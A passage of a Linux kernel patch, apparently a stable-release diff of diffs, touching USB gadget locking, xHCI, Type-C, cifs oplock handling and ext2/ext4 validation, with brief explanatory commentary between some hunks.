+-		usb_gadget_connect_locked(udc->gadget);
++	if (udc->vbus)
++		usb_gadget_connect(udc->gadget);
+ 	else
+-		usb_gadget_disconnect_locked(udc->gadget);
++		usb_gadget_disconnect(udc->gadget);
+ }
+ 
+ /**
+@@ -1116,12 +1072,10 @@ void usb_udc_vbus_handler(struct usb_gadget *gadget, bool status)
+ {
+ 	struct usb_udc *udc = gadget->udc;
+ 
+-	mutex_lock(&udc->connect_lock);
+ 	if (udc) {
+ 		udc->vbus = status;
+-		usb_udc_connect_control_locked(udc);
++		usb_udc_connect_control(udc);
+ 	}
+-	mutex_unlock(&udc->connect_lock);
+ }
+ EXPORT_SYMBOL_GPL(usb_udc_vbus_handler);
+ 
+@@ -1143,7 +1097,7 @@ void usb_gadget_udc_reset(struct usb_gadget *gadget,
+ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+ 
+ /**
+- * usb_gadget_udc_start_locked - tells usb device controller to start up
++ * usb_gadget_udc_start - tells usb device controller to start up
+  * @udc: The UDC to be started
+  *
+  * This call is issued by the UDC Class driver when it's about
+@@ -1154,11 +1108,8 @@ EXPORT_SYMBOL_GPL(usb_gadget_udc_reset);
+  * necessary to have it powered on.
+  *
+  * Returns zero on success, else negative errno.
+- *
+- * Caller should acquire connect_lock before invoking this function.
+  */
+-static inline int usb_gadget_udc_start_locked(struct usb_udc *udc)
+-	__must_hold(&udc->connect_lock)
++static inline int usb_gadget_udc_start(struct usb_udc *udc)
+ {
+ 	int ret;
+ 
+@@ -1175,7 +1126,7 @@ static inline int usb_gadget_udc_start_locked(struct usb_udc *udc)
+ }
+ 
+ /**
+- * usb_gadget_udc_stop_locked - tells usb device controller we don't need it anymore
++ * usb_gadget_udc_stop - tells usb device controller we don't need it anymore
+  * @udc: The UDC to be stopped
+  *
+  * This call is issued by the UDC Class driver after calling
+@@ -1184,11 +1135,8 @@ static inline int usb_gadget_udc_start_locked(struct usb_udc *udc)
+  * The details are implementation specific, but it can go as
+  * far as powering off UDC completely and disable its data
+  * line pullups.
+- *
+- * Caller should acquire connect lock before invoking this function.
+  */
+-static inline void usb_gadget_udc_stop_locked(struct usb_udc *udc)
+-	__must_hold(&udc->connect_lock)
++static inline void usb_gadget_udc_stop(struct usb_udc *udc)
+ {
+ 	if (!udc->started) {
+ 		dev_err(&udc->dev, "UDC had already stopped\n");
+@@ -1347,7 +1295,6 @@ int usb_add_gadget(struct usb_gadget *gadget)
+ 
+ 	udc->gadget = gadget;
+ 	gadget->udc = udc;
+-	mutex_init(&udc->connect_lock);
+ 
+ 	udc->started = false;
+ 
+@@ -1549,15 +1496,11 @@ static int gadget_bind_driver(struct device *dev)
+ 	if (ret)
+ 		goto err_bind;
+ 
+-	mutex_lock(&udc->connect_lock);
+-	ret = usb_gadget_udc_start_locked(udc);
+-	if (ret) {
+-		mutex_unlock(&udc->connect_lock);
++	ret = usb_gadget_udc_start(udc);
++	if (ret)
+ 		goto err_start;
+-	}
+ 	usb_gadget_enable_async_callbacks(udc);
+-	usb_udc_connect_control_locked(udc);
+-	mutex_unlock(&udc->connect_lock);
++	usb_udc_connect_control(udc);
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 	return 0;
+@@ -1588,14 +1531,12 @@ static void gadget_unbind_driver(struct device *dev)
+ 
+ 	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ 
+-	mutex_lock(&udc->connect_lock);
+-	usb_gadget_disconnect_locked(gadget);
++	usb_gadget_disconnect(gadget);
+ 	usb_gadget_disable_async_callbacks(udc);
+ 	if (gadget->irq)
+ 		synchronize_irq(gadget->irq);
+ 	udc->driver->unbind(gadget);
+-	usb_gadget_udc_stop_locked(udc);
+-	mutex_unlock(&udc->connect_lock);
++	usb_gadget_udc_stop(udc);
+ 
+ 	mutex_lock(&udc_lock);
+ 	driver->is_bound = false;
+@@ -1681,15 +1622,11 @@ static ssize_t soft_connect_store(struct device *dev,
+ 	}
+ 
+ 	if (sysfs_streq(buf, "connect")) {
+-		mutex_lock(&udc->connect_lock);
+-		usb_gadget_udc_start_locked(udc);
+-		usb_gadget_connect_locked(udc->gadget);
+-		mutex_unlock(&udc->connect_lock);
++		usb_gadget_udc_start(udc);
++		usb_gadget_connect(udc->gadget);
+ 	} else if (sysfs_streq(buf, "disconnect")) {
+-		mutex_lock(&udc->connect_lock);
+-		usb_gadget_disconnect_locked(udc->gadget);
+-		usb_gadget_udc_stop_locked(udc);
+-		mutex_unlock(&udc->connect_lock);
++		usb_gadget_disconnect(udc->gadget);
++		usb_gadget_udc_stop(udc);
+ 	} else {
+ 		dev_err(dev, "unsupported command '%s'\n", buf);
+ 		ret = -EINVAL;
+diff --git a/drivers/usb/host/uhci-pci.c b/drivers/usb/host/uhci-pci.c
+index 3592f757fe05d..7bd2fddde770a 100644
+--- a/drivers/usb/host/uhci-pci.c
++++ b/drivers/usb/host/uhci-pci.c
+@@ -119,11 +119,13 @@ static int uhci_pci_init(struct usb_hcd *hcd)
+ 
+ 	uhci->rh_numports = uhci_count_ports(hcd);
+ 
+-	/* Intel controllers report the OverCurrent bit active on.
+-	 * VIA controllers report it active off, so we'll adjust the
+-	 * bit value.  (It's not standardized in the UHCI spec.)
++	/*
++	 * Intel controllers report the OverCurrent bit active on.  VIA
++	 * and ZHAOXIN controllers report it active off, so we'll adjust
++	 * the bit value.  (It's not standardized in the UHCI spec.)
+ 	 */
+-	if (to_pci_dev(uhci_dev(uhci))->vendor == PCI_VENDOR_ID_VIA)
++	if (to_pci_dev(uhci_dev(uhci))->vendor == PCI_VENDOR_ID_VIA ||
++			to_pci_dev(uhci_dev(uhci))->vendor == PCI_VENDOR_ID_ZHAOXIN)
+ 		uhci->oc_low = 1;
+ 
+ 	/* HP's server management chip requires a longer port reset delay. */
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index 232e175e4e964..6e4dac71c409e 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -13,6 +13,7 @@
+ #include <linux/module.h>
+ #include <linux/acpi.h>
+ #include <linux/reset.h>
++#include <linux/suspend.h>
+ 
+ #include "xhci.h"
+ #include "xhci-trace.h"
+@@ -194,7 +195,7 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 
+ 	if (pdev->vendor == PCI_VENDOR_ID_AMD &&
+ 		pdev->device == PCI_DEVICE_ID_AMD_RENOIR_XHCI)
+-		xhci->quirks |= XHCI_BROKEN_D3COLD;
++		xhci->quirks |= XHCI_BROKEN_D3COLD_S2I;
+ 
+ 	if (pdev->vendor == PCI_VENDOR_ID_INTEL) {
+ 		xhci->quirks |= XHCI_LPM_SUPPORT;
+@@ -609,9 +610,16 @@ static int xhci_pci_suspend(struct usb_hcd *hcd, bool do_wakeup)
+ 	 * Systems with the TI redriver that loses port status change events
+ 	 * need to have the registers polled during D3, so avoid D3cold.
+ 	 */
+-	if (xhci->quirks & (XHCI_COMP_MODE_QUIRK | XHCI_BROKEN_D3COLD))
++	if (xhci->quirks & XHCI_COMP_MODE_QUIRK)
+ 		pci_d3cold_disable(pdev);
+ 
++#ifdef CONFIG_SUSPEND
++	/* d3cold is broken, but only when s2idle is used */
++	if (pm_suspend_target_state == PM_SUSPEND_TO_IDLE &&
++	    xhci->quirks & (XHCI_BROKEN_D3COLD_S2I))
++		pci_d3cold_disable(pdev);
++#endif
++
+ 	if (xhci->quirks & XHCI_PME_STUCK_QUIRK)
+ 		xhci_pme_quirk(hcd);
+ 
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index dce02d0aad8d0..7a7ab525675b7 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -276,6 +276,26 @@ static void inc_enq(struct xhci_hcd *xhci, struct xhci_ring *ring,
+ 	trace_xhci_inc_enq(ring);
+ }
+ 
++static int xhci_num_trbs_to(struct xhci_segment *start_seg, union xhci_trb *start,
++			    struct xhci_segment *end_seg, union xhci_trb *end,
++			    unsigned int num_segs)
++{
++	union xhci_trb *last_on_seg;
++	int num = 0;
++	int i = 0;
++
++	do {
++		if (start_seg == end_seg && end >= start)
++			return num + (end - start);
++		last_on_seg = &start_seg->trbs[TRBS_PER_SEGMENT - 1];
++		num += last_on_seg - start;
++		start_seg = start_seg->next;
++		start = start_seg->trbs;
++	} while (i++ <= num_segs);
++
++	return -EINVAL;
++}
++
+ /*
+  * Check to see if there's room to enqueue num_trbs on the ring and make sure
+  * enqueue pointer will not advance into dequeue segment. See rules above.
+@@ -2141,6 +2161,7 @@ static int finish_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 		     u32 trb_comp_code)
+ {
+ 	struct xhci_ep_ctx *ep_ctx;
++	int trbs_freed;
+ 
+ 	ep_ctx = xhci_get_ep_ctx(xhci, ep->vdev->out_ctx, ep->ep_index);
+ 
+@@ -2212,9 +2233,15 @@ static int finish_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 	}
+ 
+ 	/* Update ring dequeue pointer */
++	trbs_freed = xhci_num_trbs_to(ep_ring->deq_seg, ep_ring->dequeue,
++				      td->last_trb_seg, td->last_trb,
++				      ep_ring->num_segs);
++	if (trbs_freed < 0)
++		xhci_dbg(xhci, "Failed to count freed trbs at TD finish\n");
++	else
++		ep_ring->num_trbs_free += trbs_freed;
+ 	ep_ring->dequeue = td->last_trb;
+ 	ep_ring->deq_seg = td->last_trb_seg;
+-	ep_ring->num_trbs_free += td->num_trbs - 1;
+ 	inc_deq(xhci, ep_ring);
+ 
+ 	return xhci_td_cleanup(xhci, td, ep_ring, td->status);
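
xhci_num_trbs_to() replaces the old 'td->num_trbs - 1' bookkeeping with an exact count from the ring's dequeue pointer to the TD's last TRB, which stays correct even when the dequeue pointer has been moved, e.g. after a stall or a cancelled TD. Conceptually the walk sums whole segments between the two points (simplified sketch; the real helper also bounds the loop by the segment count and returns -EINVAL if the end is never reached):

    num = 0;
    while (seg != end_seg) {
            num += &seg->trbs[TRBS_PER_SEGMENT - 1] - trb;  /* rest of segment */
            seg  = seg->next;
            trb  = seg->trbs;
    }
    num += end_trb - trb;                                   /* final partial segment */
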
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index dcee7f3207add..6348cacdc65ef 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -1895,7 +1895,7 @@ struct xhci_hcd {
+ #define XHCI_DISABLE_SPARSE	BIT_ULL(38)
+ #define XHCI_SG_TRB_CACHE_SIZE_QUIRK	BIT_ULL(39)
+ #define XHCI_NO_SOFT_RETRY	BIT_ULL(40)
+-#define XHCI_BROKEN_D3COLD	BIT_ULL(41)
++#define XHCI_BROKEN_D3COLD_S2I	BIT_ULL(41)
+ #define XHCI_EP_CTX_BROKEN_DCS	BIT_ULL(42)
+ #define XHCI_SUSPEND_RESUME_CLKS	BIT_ULL(43)
+ #define XHCI_RESET_TO_DEFAULT	BIT_ULL(44)
+diff --git a/drivers/usb/storage/scsiglue.c b/drivers/usb/storage/scsiglue.c
+index 8931df5a85fd9..c54e9805da536 100644
+--- a/drivers/usb/storage/scsiglue.c
++++ b/drivers/usb/storage/scsiglue.c
+@@ -406,22 +406,25 @@ static DEF_SCSI_QCMD(queuecommand)
+  ***********************************************************************/
+ 
+ /* Command timeout and abort */
+-static int command_abort(struct scsi_cmnd *srb)
++static int command_abort_matching(struct us_data *us, struct scsi_cmnd *srb_match)
+ {
+-	struct us_data *us = host_to_us(srb->device->host);
+-
+-	usb_stor_dbg(us, "%s called\n", __func__);
+-
+ 	/*
+ 	 * us->srb together with the TIMED_OUT, RESETTING, and ABORTING
+ 	 * bits are protected by the host lock.
+ 	 */
+ 	scsi_lock(us_to_host(us));
+ 
+-	/* Is this command still active? */
+-	if (us->srb != srb) {
++	/* Is there any active pending command to abort? */
++	if (!us->srb) {
+ 		scsi_unlock(us_to_host(us));
+ 		usb_stor_dbg(us, "-- nothing to abort\n");
++		return SUCCESS;
++	}
++
++	/* Does the command match the passed srb, if any? */
++	if (srb_match && us->srb != srb_match) {
++		scsi_unlock(us_to_host(us));
++		usb_stor_dbg(us, "-- pending command mismatch\n");
+ 		return FAILED;
+ 	}
+ 
+@@ -444,6 +447,14 @@ static int command_abort(struct scsi_cmnd *srb)
+ 	return SUCCESS;
+ }
+ 
++static int command_abort(struct scsi_cmnd *srb)
++{
++	struct us_data *us = host_to_us(srb->device->host);
++
++	usb_stor_dbg(us, "%s called\n", __func__);
++	return command_abort_matching(us, srb);
++}
++
+ /*
+  * This invokes the transport reset mechanism to reset the state of the
+  * device
+@@ -455,6 +466,9 @@ static int device_reset(struct scsi_cmnd *srb)
+ 
+ 	usb_stor_dbg(us, "%s called\n", __func__);
+ 
++	/* abort any pending command before reset */
++	command_abort_matching(us, NULL);
++
+ 	/* lock the device pointers and do the reset */
+ 	mutex_lock(&(us->dev_mutex));
+ 	result = us->transport_reset(us);
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index 4075c0d7e6a2c..7cdf83f4c811b 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -513,6 +513,10 @@ static ssize_t pin_assignment_show(struct device *dev,
+ 
+ 	mutex_unlock(&dp->lock);
+ 
++	/* get_current_pin_assignments can return 0 when no matching pin assignments are found */
++	if (len == 0)
++		len++;
++
+ 	buf[len - 1] = '\n';
+ 	return len;
+ }
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 032d21a967799..524099634a1d4 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -1514,7 +1514,21 @@ static bool svdm_consume_svids(struct tcpm_port *port, const u32 *p, int cnt)
+ 		pmdata->svids[pmdata->nsvids++] = svid;
+ 		tcpm_log(port, "SVID %d: 0x%x", pmdata->nsvids, svid);
+ 	}
+-	return true;
++
++	/*
++	 * PD3.0 Spec 6.4.4.3.2: The SVIDs are returned 2 per VDO (see Table
++	 * 6-43), and can be returned maximum 6 VDOs per response (see Figure
++	 * 6-19). If the Responder supports 12 or more SVIDs, then the Discover
++	 * SVIDs Command Shall be executed multiple times until a Discover
++	 * SVIDs VDO is returned ending either with a SVID value of 0x0000 in
++	 * the last part of the last VDO or with a VDO containing two SVIDs
++	 * with values of 0x0000.
++	 *
++	 * However, some odd docks advertise fewer than 12 SVIDs but without
++	 * 0x0000 in the last VDO, so we need to break off the Discover SVIDs
++	 * sequence and return false here.
++	 */
++	return cnt == 7;
+ abort:
+ 	tcpm_log(port, "SVID_DISCOVERY_MAX(%d) too low!", SVID_DISCOVERY_MAX);
+ 	return false;
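
The 'return cnt == 7' test encodes the VDO layout the comment describes: a Discover SVIDs response is one VDM header plus at most six SVID VDOs, with two 16-bit SVIDs packed per VDO. Only a completely full response can indicate that more SVIDs remain and another Discover SVIDs command is worthwhile; any shorter response must be the final chunk. The arithmetic, spelled out (a sketch, not driver code):

    /* cnt counts 32-bit words including the VDM header (PD3.0 table 6-43) */
    int num_vdos  = cnt - 1;        /* 0..6 data VDOs                       */
    int max_svids = num_vdos * 2;   /* two SVIDs per VDO, so at most 12     */
    bool more     = (cnt == 7);     /* full response => issue another query */
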
+diff --git a/drivers/usb/typec/ucsi/ucsi_acpi.c b/drivers/usb/typec/ucsi/ucsi_acpi.c
+index 62206a6b8ea75..217355f1f9b94 100644
+--- a/drivers/usb/typec/ucsi/ucsi_acpi.c
++++ b/drivers/usb/typec/ucsi/ucsi_acpi.c
+@@ -9,6 +9,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/module.h>
+ #include <linux/acpi.h>
++#include <linux/dmi.h>
+ 
+ #include "ucsi.h"
+ 
+@@ -23,6 +24,7 @@ struct ucsi_acpi {
+ 	struct completion complete;
+ 	unsigned long flags;
+ 	guid_t guid;
++	u64 cmd;
+ };
+ 
+ static int ucsi_acpi_dsm(struct ucsi_acpi *ua, int func)
+@@ -62,6 +64,7 @@ static int ucsi_acpi_async_write(struct ucsi *ucsi, unsigned int offset,
+ 	struct ucsi_acpi *ua = ucsi_get_drvdata(ucsi);
+ 
+ 	memcpy(ua->base + offset, val, val_len);
++	ua->cmd = *(u64 *)val;
+ 
+ 	return ucsi_acpi_dsm(ua, UCSI_DSM_FUNC_WRITE);
+ }
+@@ -93,13 +96,46 @@ static const struct ucsi_operations ucsi_acpi_ops = {
+ 	.async_write = ucsi_acpi_async_write
+ };
+ 
++static int
++ucsi_zenbook_read(struct ucsi *ucsi, unsigned int offset, void *val, size_t val_len)
++{
++	struct ucsi_acpi *ua = ucsi_get_drvdata(ucsi);
++	int ret;
++
++	if (offset == UCSI_VERSION || UCSI_COMMAND(ua->cmd) == UCSI_PPM_RESET) {
++		ret = ucsi_acpi_dsm(ua, UCSI_DSM_FUNC_READ);
++		if (ret)
++			return ret;
++	}
++
++	memcpy(val, ua->base + offset, val_len);
++
++	return 0;
++}
++
++static const struct ucsi_operations ucsi_zenbook_ops = {
++	.read = ucsi_zenbook_read,
++	.sync_write = ucsi_acpi_sync_write,
++	.async_write = ucsi_acpi_async_write
++};
++
++static const struct dmi_system_id zenbook_dmi_id[] = {
++	{
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "ZenBook UX325UA_UM325UA"),
++		},
++	},
++	{ }
++};
++
+ static void ucsi_acpi_notify(acpi_handle handle, u32 event, void *data)
+ {
+ 	struct ucsi_acpi *ua = data;
+ 	u32 cci;
+ 	int ret;
+ 
+-	ret = ucsi_acpi_read(ua->ucsi, UCSI_CCI, &cci, sizeof(cci));
++	ret = ua->ucsi->ops->read(ua->ucsi, UCSI_CCI, &cci, sizeof(cci));
+ 	if (ret)
+ 		return;
+ 
+@@ -114,6 +150,7 @@ static void ucsi_acpi_notify(acpi_handle handle, u32 event, void *data)
+ static int ucsi_acpi_probe(struct platform_device *pdev)
+ {
+ 	struct acpi_device *adev = ACPI_COMPANION(&pdev->dev);
++	const struct ucsi_operations *ops = &ucsi_acpi_ops;
+ 	struct ucsi_acpi *ua;
+ 	struct resource *res;
+ 	acpi_status status;
+@@ -143,7 +180,10 @@ static int ucsi_acpi_probe(struct platform_device *pdev)
+ 	init_completion(&ua->complete);
+ 	ua->dev = &pdev->dev;
+ 
+-	ua->ucsi = ucsi_create(&pdev->dev, &ucsi_acpi_ops);
++	if (dmi_check_system(zenbook_dmi_id))
++		ops = &ucsi_zenbook_ops;
++
++	ua->ucsi = ucsi_create(&pdev->dev, ops);
+ 	if (IS_ERR(ua->ucsi))
+ 		return PTR_ERR(ua->ucsi);
+ 
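
The Zenbook workaround uses the standard DMI quirk-table idiom: a null-terminated array of dmi_system_id matches, consulted once at probe time to substitute alternate ops for known-broken firmware. In general form (a sketch; the match keys are whatever uniquely identifies the affected machines):

    static const struct dmi_system_id quirk_dmi_ids[] = {
            {
                    .matches = {
                            DMI_MATCH(DMI_SYS_VENDOR, "Vendor Inc."),
                            DMI_MATCH(DMI_PRODUCT_NAME, "Model XYZ"),
                    },
            },
            { }     /* terminator */
    };

    if (dmi_check_system(quirk_dmi_ids))
            ops = &quirked_ops;     /* otherwise keep the default ops */
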
+diff --git a/drivers/video/fbdev/arcfb.c b/drivers/video/fbdev/arcfb.c
+index 45e64016db328..024d0ee4f04f9 100644
+--- a/drivers/video/fbdev/arcfb.c
++++ b/drivers/video/fbdev/arcfb.c
+@@ -523,7 +523,7 @@ static int arcfb_probe(struct platform_device *dev)
+ 
+ 	info = framebuffer_alloc(sizeof(struct arcfb_par), &dev->dev);
+ 	if (!info)
+-		goto err;
++		goto err_fb_alloc;
+ 
+ 	info->screen_base = (char __iomem *)videomemory;
+ 	info->fbops = &arcfb_ops;
+@@ -535,7 +535,7 @@ static int arcfb_probe(struct platform_device *dev)
+ 
+ 	if (!dio_addr || !cio_addr || !c2io_addr) {
+ 		printk(KERN_WARNING "no IO addresses supplied\n");
+-		goto err1;
++		goto err_addr;
+ 	}
+ 	par->dio_addr = dio_addr;
+ 	par->cio_addr = cio_addr;
+@@ -551,12 +551,12 @@ static int arcfb_probe(struct platform_device *dev)
+ 			printk(KERN_INFO
+ 				"arcfb: Failed req IRQ %d\n", par->irq);
+ 			retval = -EBUSY;
+-			goto err1;
++			goto err_addr;
+ 		}
+ 	}
+ 	retval = register_framebuffer(info);
+ 	if (retval < 0)
+-		goto err1;
++		goto err_register_fb;
+ 	platform_set_drvdata(dev, info);
+ 	fb_info(info, "Arc frame buffer device, using %dK of video memory\n",
+ 		videomemorysize >> 10);
+@@ -580,9 +580,12 @@ static int arcfb_probe(struct platform_device *dev)
+ 	}
+ 
+ 	return 0;
+-err1:
++
++err_register_fb:
++	free_irq(par->irq, info);
++err_addr:
+ 	framebuffer_release(info);
+-err:
++err_fb_alloc:
+ 	vfree(videomemory);
+ 	return retval;
+ }
+diff --git a/fs/ceph/snap.c b/fs/ceph/snap.c
+index 87007203f130e..0b236ebd989fc 100644
+--- a/fs/ceph/snap.c
++++ b/fs/ceph/snap.c
+@@ -1111,6 +1111,19 @@ skip_inode:
+ 				continue;
+ 			adjust_snap_realm_parent(mdsc, child, realm->ino);
+ 		}
++	} else {
++		/*
++		 * In the non-split case both 'num_split_inos' and
++		 * 'num_split_realms' should be 0, making this a no-op.
++		 * However, the MDS happens to populate the 'split_realms' list
++		 * in one of the UPDATE op cases by mistake.
++		 *
++		 * Skip both lists just in case to ensure that 'p' is
++		 * positioned at the start of realm info, as expected by
++		 * ceph_update_snap_trace().
++		 */
++		p += sizeof(u64) * num_split_inos;
++		p += sizeof(u64) * num_split_realms;
+ 	}
+ 
+ 	/*
+diff --git a/fs/cifs/cifsglob.h b/fs/cifs/cifsglob.h
+index 157d3c0e3cc76..6ec1a34738e27 100644
+--- a/fs/cifs/cifsglob.h
++++ b/fs/cifs/cifsglob.h
+@@ -428,8 +428,8 @@ struct smb_version_operations {
+ 	/* check for STATUS_NETWORK_SESSION_EXPIRED */
+ 	bool (*is_session_expired)(char *);
+ 	/* send oplock break response */
+-	int (*oplock_response)(struct cifs_tcon *, struct cifs_fid *,
+-			       struct cifsInodeInfo *);
++	int (*oplock_response)(struct cifs_tcon *tcon, __u64 persistent_fid, __u64 volatile_fid,
++			__u16 net_fid, struct cifsInodeInfo *cifs_inode);
+ 	/* query remote filesystem */
+ 	int (*queryfs)(const unsigned int, struct cifs_tcon *,
+ 		       struct cifs_sb_info *, struct kstatfs *);
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index 158a0a5f40071..9a4c33ffb75fa 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -5086,9 +5086,9 @@ void cifs_oplock_break(struct work_struct *work)
+ 	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+ 	struct TCP_Server_Info *server = tcon->ses->server;
+ 	int rc = 0;
+-	bool purge_cache = false;
+-	struct cifs_deferred_close *dclose;
+-	bool is_deferred = false;
++	bool purge_cache = false, oplock_break_cancelled;
++	__u64 persistent_fid, volatile_fid;
++	__u16 net_fid;
+ 
+ 	wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS,
+ 			TASK_UNINTERRUPTIBLE);
+@@ -5129,28 +5129,28 @@ oplock_break_ack:
+ 	 * file handles but cached, then schedule deferred close immediately.
+ 	 * So, new open will not use cached handle.
+ 	 */
+-	spin_lock(&CIFS_I(inode)->deferred_lock);
+-	is_deferred = cifs_is_deferred_close(cfile, &dclose);
+-	spin_unlock(&CIFS_I(inode)->deferred_lock);
+ 
+-	if (!CIFS_CACHE_HANDLE(cinode) && is_deferred &&
+-			cfile->deferred_close_scheduled && delayed_work_pending(&cfile->deferred)) {
++	if (!CIFS_CACHE_HANDLE(cinode) && !list_empty(&cinode->deferred_closes))
+ 		cifs_close_deferred_file(cinode);
+-	}
+ 
++	persistent_fid = cfile->fid.persistent_fid;
++	volatile_fid = cfile->fid.volatile_fid;
++	net_fid = cfile->fid.netfid;
++	oplock_break_cancelled = cfile->oplock_break_cancelled;
++
++	_cifsFileInfo_put(cfile, false /* do not wait for ourself */, false);
+ 	/*
+ 	 * releasing stale oplock after recent reconnect of smb session using
+ 	 * a now incorrect file handle is not a data integrity issue but do
+ 	 * not bother sending an oplock release if session to server still is
+ 	 * disconnected since oplock already released by the server
+ 	 */
+-	if (!cfile->oplock_break_cancelled) {
+-		rc = tcon->ses->server->ops->oplock_response(tcon, &cfile->fid,
+-							     cinode);
++	if (!oplock_break_cancelled) {
++		rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
++				volatile_fid, net_fid, cinode);
+ 		cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
+ 	}
+ 
+-	_cifsFileInfo_put(cfile, false /* do not wait for ourself */, false);
+ 	cifs_done_oplock_break(cinode);
+ }
+ 
+diff --git a/fs/cifs/smb1ops.c b/fs/cifs/smb1ops.c
+index abda6148be10f..7d1b3fc014d94 100644
+--- a/fs/cifs/smb1ops.c
++++ b/fs/cifs/smb1ops.c
+@@ -897,12 +897,11 @@ cifs_close_dir(const unsigned int xid, struct cifs_tcon *tcon,
+ }
+ 
+ static int
+-cifs_oplock_response(struct cifs_tcon *tcon, struct cifs_fid *fid,
+-		     struct cifsInodeInfo *cinode)
++cifs_oplock_response(struct cifs_tcon *tcon, __u64 persistent_fid,
++		__u64 volatile_fid, __u16 net_fid, struct cifsInodeInfo *cinode)
+ {
+-	return CIFSSMBLock(0, tcon, fid->netfid, current->tgid, 0, 0, 0, 0,
+-			   LOCKING_ANDX_OPLOCK_RELEASE, false,
+-			   CIFS_CACHE_READ(cinode) ? 1 : 0);
++	return CIFSSMBLock(0, tcon, net_fid, current->tgid, 0, 0, 0, 0,
++			   LOCKING_ANDX_OPLOCK_RELEASE, false, CIFS_CACHE_READ(cinode) ? 1 : 0);
+ }
+ 
+ static int
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 7468f8baf4990..d512440d35b6f 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -2383,15 +2383,14 @@ smb2_is_network_name_deleted(char *buf, struct TCP_Server_Info *server)
+ }
+ 
+ static int
+-smb2_oplock_response(struct cifs_tcon *tcon, struct cifs_fid *fid,
+-		     struct cifsInodeInfo *cinode)
++smb2_oplock_response(struct cifs_tcon *tcon, __u64 persistent_fid,
++		__u64 volatile_fid, __u16 net_fid, struct cifsInodeInfo *cinode)
+ {
+ 	if (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_LEASING)
+ 		return SMB2_lease_break(0, tcon, cinode->lease_key,
+ 					smb2_get_lease_state(cinode));
+ 
+-	return SMB2_oplock_break(0, tcon, fid->persistent_fid,
+-				 fid->volatile_fid,
++	return SMB2_oplock_break(0, tcon, persistent_fid, volatile_fid,
+ 				 CIFS_CACHE_READ(cinode) ? 1 : 0);
+ }
+ 
+diff --git a/fs/ext2/ext2.h b/fs/ext2/ext2.h
+index 28de11a22e5f6..dc5dcb78bc27f 100644
+--- a/fs/ext2/ext2.h
++++ b/fs/ext2/ext2.h
+@@ -180,6 +180,7 @@ static inline struct ext2_sb_info *EXT2_SB(struct super_block *sb)
+ #define EXT2_MIN_BLOCK_SIZE		1024
+ #define	EXT2_MAX_BLOCK_SIZE		4096
+ #define EXT2_MIN_BLOCK_LOG_SIZE		  10
++#define EXT2_MAX_BLOCK_LOG_SIZE		  16
+ #define EXT2_BLOCK_SIZE(s)		((s)->s_blocksize)
+ #define	EXT2_ADDR_PER_BLOCK(s)		(EXT2_BLOCK_SIZE(s) / sizeof (__u32))
+ #define EXT2_BLOCK_SIZE_BITS(s)		((s)->s_blocksize_bits)
+diff --git a/fs/ext2/super.c b/fs/ext2/super.c
+index 03f2af98b1b48..3feea4b31fa7e 100644
+--- a/fs/ext2/super.c
++++ b/fs/ext2/super.c
+@@ -945,6 +945,13 @@ static int ext2_fill_super(struct super_block *sb, void *data, int silent)
+ 		goto failed_mount;
+ 	}
+ 
++	if (le32_to_cpu(es->s_log_block_size) >
++	    (EXT2_MAX_BLOCK_LOG_SIZE - BLOCK_SIZE_BITS)) {
++		ext2_msg(sb, KERN_ERR,
++			 "Invalid log block size: %u",
++			 le32_to_cpu(es->s_log_block_size));
++		goto failed_mount;
++	}
+ 	blocksize = BLOCK_SIZE << le32_to_cpu(sbi->s_es->s_log_block_size);
+ 
+ 	if (test_opt(sb, DAX)) {
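
The new ext2 check bounds s_log_block_size before it is used as a shift count: the block size is computed as 1024 << s_log_block_size, so an unvalidated value from a crafted superblock could shift far past the type width. With EXT2_MAX_BLOCK_LOG_SIZE = 16 and BLOCK_SIZE_BITS = 10, the accepted values work out as follows (sketch of the arithmetic):

    /* blocksize = BLOCK_SIZE << log_size = 1024 << log_size           */
    /* accepted: log_size <= 16 - 10 = 6, i.e. blocksize 1K .. 64K max */
    blocksize = BLOCK_SIZE << le32_to_cpu(sbi->s_es->s_log_block_size);
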
+diff --git a/fs/ext4/balloc.c b/fs/ext4/balloc.c
+index f2c415f31b755..a38aa33af08ef 100644
+--- a/fs/ext4/balloc.c
++++ b/fs/ext4/balloc.c
+@@ -319,6 +319,22 @@ static ext4_fsblk_t ext4_valid_block_bitmap_padding(struct super_block *sb,
+ 	return (next_zero_bit < bitmap_size ? next_zero_bit : 0);
+ }
+ 
++struct ext4_group_info *ext4_get_group_info(struct super_block *sb,
++					    ext4_group_t group)
++{
++	 struct ext4_group_info **grp_info;
